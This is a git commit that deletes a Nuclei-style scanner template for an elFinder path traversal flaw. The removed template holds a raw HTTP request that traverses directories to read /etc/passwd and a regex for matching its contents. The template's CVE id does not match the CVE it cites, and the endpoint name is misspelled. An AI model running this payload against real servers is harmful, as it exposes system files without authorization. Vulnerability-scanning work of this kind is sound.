Delete CVE-2022-0543

patch-1
PikPikcU 2022-06-30 19:29:52 -04:00 committed by GitHub
parent 732217c33a
commit 6735f99a54
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 25 deletions

View File

@ -1,25 +0,0 @@
id: CVE-2022-0543
info:
name: elFinder - Path Traversal
author: pikpikcu
severity: critical
description: |
Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
tags: cve,cve2022,lfi,elfinder
requests:
- raw:
- |
GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"